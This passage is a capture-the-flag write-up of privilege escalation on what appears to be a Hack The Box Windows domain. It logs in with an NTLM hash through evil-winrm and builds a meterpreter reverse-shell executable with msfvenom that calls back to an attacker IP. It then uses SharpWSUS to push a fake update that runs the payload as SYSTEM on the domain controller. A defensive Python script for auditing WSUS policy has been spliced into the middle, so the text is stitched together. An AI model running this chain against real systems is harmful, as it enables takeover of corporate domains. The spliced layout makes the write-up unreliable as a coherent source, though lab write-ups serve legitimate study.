Priv Esc
evil-winrm -i 10.10.11.175 -u sflowers -H 1FCDB1F6015DCB318CC77BB2BDA14DB5
*Evil-WinRM* PS C:\Users\sflowers> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate
SetActiveHours REG_DWORD 0x1
ActiveHoursStart REG_DWORD 0x0
ActiveHoursEnd REG_DWORD 0x17
AcceptTrustedPublisherCerts REG_DWORD 0x1
ExcludeWUDriversInQualityUpdate REG_DWORD 0x1
DoNotConnectToWindowsUpdateInternetLocations REG_DWORD 0x1
WUServer REG_SZ http://wsus.outdated.htb:8530
WUStatusServer REG_SZ http://wsus.outdated.htb:8530
UpdateServiceUrlAlternate REG_SZ
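The policy values returned by the `reg query` above can be audited from the defender's side. The following is an added example, not part of the original write-up: it parses that output and flags a WSUS URL without TLS and the `AcceptTrustedPublisherCerts` setting. The names `parse_reg_query` and `audit_wsus_policy` are hypothetical, and `SAMPLE` is the page's output re-typed as constructed input.

```python
import re
from urllib.parse import urlparse

# Constructed sample: the `reg query` output from this page, pasted as text.
SAMPLE = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate
    SetActiveHours    REG_DWORD    0x1
    ActiveHoursStart    REG_DWORD    0x0
    ActiveHoursEnd    REG_DWORD    0x17
    AcceptTrustedPublisherCerts    REG_DWORD    0x1
    ExcludeWUDriversInQualityUpdate    REG_DWORD    0x1
    DoNotConnectToWindowsUpdateInternetLocations    REG_DWORD    0x1
    WUServer    REG_SZ    http://wsus.outdated.htb:8530
    WUStatusServer    REG_SZ    http://wsus.outdated.htb:8530
    UpdateServiceUrlAlternate    REG_SZ
"""

# "<name> <REG_TYPE> [data]"; the key-path line has no REG_ type and is skipped.
VALUE_LINE = re.compile(r"^\s*(\S+)\s+(REG_\w+)(?:\s+(.*\S))?\s*$")

def parse_reg_query(text):
    """Return {value_name: data}; REG_DWORD data is converted to int."""
    values = {}
    for line in text.splitlines():
        m = VALUE_LINE.match(line)
        if m:
            name, kind, data = m.group(1), m.group(2), m.group(3) or ""
            values[name] = int(data, 16) if kind == "REG_DWORD" and data else data
    return values

def audit_wsus_policy(values):
    """Return a list of findings for the Windows Update client policy."""
    findings = []
    for name in ("WUServer", "WUStatusServer"):
        url = values.get(name, "")
        if url and urlparse(url).scheme.lower() != "https":
            findings.append(f"{name}={url}: WSUS traffic is not protected by TLS")
    if values.get("AcceptTrustedPublisherCerts") == 1:
        findings.append("AcceptTrustedPublisherCerts=1: updates signed by any "
                        "certificate in Trusted Publishers are accepted")
    return findings

if __name__ == "__main__":
    for finding in audit_wsus_policy(parse_reg_query(SAMPLE)):
        print("[!]", finding)
```

This audit covers the client-side policy only; the SharpWSUS run later on this page operates on the WSUS server itself, which a client policy check does not detect.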
adot@pwndot:~/opt$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.18 LPORT=4443 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
adot@pwndot:~$ msfconsole -q -x 'use exploit/multi/handler;set LHOST tun0; set LPORT 4443; set payload windows/x64/meterpreter/reverse_tcp; run'
[*] Starting persistent handler(s)...
[*] Using configured payload generic/shell_reverse_tcp
LHOST => tun0
LPORT => 4443
payload => windows/x64/meterpreter/reverse_tcp
[*] Started reverse TCP handler on 10.10.14.18:4443
Compile SharpWSUS, upload it and run it:
*Evil-WinRM* PS C:\Users\sflowers\Documents> .\sharpwsus.exe create /payload:"C:\programdata\psexec.exe" /args:"-accepteula -s -d C:\programdata\shell.exe" /title:"Pwned"
____ _ __ ______ _ _ ____
/ ___|| |__ __ _ _ __ _ _\ \ / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
___) | | | | (_| | | | |_) \ V V / ___) | |_| |___) |
|____/|_| |_|\__,_|_| | .__/ \_/\_/ |____/ \___/|____/
|_|
Phil Keeble @ Nettitude Red Team
[*] Action: Create Update
[*] Creating patch to use the following:
[*] Payload: psexec.exe
[*] Payload Path: C:\programdata\psexec.exe
[*] Arguments: -accepteula -s -d C:\programdata\shell.exe
[*] Arguments (HTML Encoded): -accepteula -s -d C:\programdata\shell.exe
################# WSUS Server Enumeration via SQL ##################
ServerName, WSUSPortNumber, WSUSContentLocation
-----------------------------------------------
DC, 8530, c:\WSUS\WsusContent
ImportUpdate
Update Revision ID: 30
PrepareXMLtoClient
InjectURL2Download
DeploymentRevision
PrepareBundle
PrepareBundle Revision ID: 31
PrepareXMLBundletoClient
DeploymentRevision
[*] Update created - When ready to deploy use the following command:
[*] SharpWSUS.exe approve /updateid:da80d522-aefa-44c7-9ed9-42970cb23af8 /computername:Target.FQDN /groupname:"Group Name"
[*] To check on the update status use the following command:
[*] SharpWSUS.exe check /updateid:da80d522-aefa-44c7-9ed9-42970cb23af8 /computername:Target.FQDN
[*] To delete the update use the following command:
[*] SharpWSUS.exe delete /updateid:da80d522-aefa-44c7-9ed9-42970cb23af8 /computername:Target.FQDN /groupname:"Group Name"
[*] Create complete
*Evil-WinRM* PS C:\Users\sflowers\Documents> .\SharpWSUS.exe approve /updateid:da80d522-aefa-44c7-9ed9-42970cb23af8 /computername:DC.outdated.htb /groupname:"PwnedLOL"
____ _ __ ______ _ _ ____
/ ___|| |__ __ _ _ __ _ _\ \ / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
___) | | | | (_| | | | |_) \ V V / ___) | |_| |___) |
|____/|_| |_|\__,_|_| | .__/ \_/\_/ |____/ \___/|____/
|_|
Phil Keeble @ Nettitude Red Team
[*] Action: Approve Update
Targeting DC.outdated.htb
TargetComputer, ComputerID, TargetID
------------------------------------
DC.outdated.htb, bd6d57d0-5e6f-4e74-a789-35c8955299e1, 1
Group Exists = False
Group Created: PwnedLOL
Added Computer To Group
Approved Update
[*] Approve complete
*Evil-WinRM* PS C:\Users\sflowers\Documents> .\SharpWSUS.exe check /updateid:da80d522-aefa-44c7-9ed9-42970cb23af8 /computername:DC.outdated.htb /groupname:"PwnedLOL"
____ _ __ ______ _ _ ____
/ ___|| |__ __ _ _ __ _ _\ \ / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
___) | | | | (_| | | | |_) \ V V / ___) | |_| |___) |
|____/|_| |_|\__,_|_| | .__/ \_/\_/ |____/ \___/|____/
|_|
Phil Keeble @ Nettitude Red Team
[*] Action: Check Update
Targeting DC.outdated.htb
TargetComputer, ComputerID, TargetID
------------------------------------
DC.outdated.htb, bd6d57d0-5e6f-4e74-a789-35c8955299e1, 1
[*] Update is installed
[*] Check complete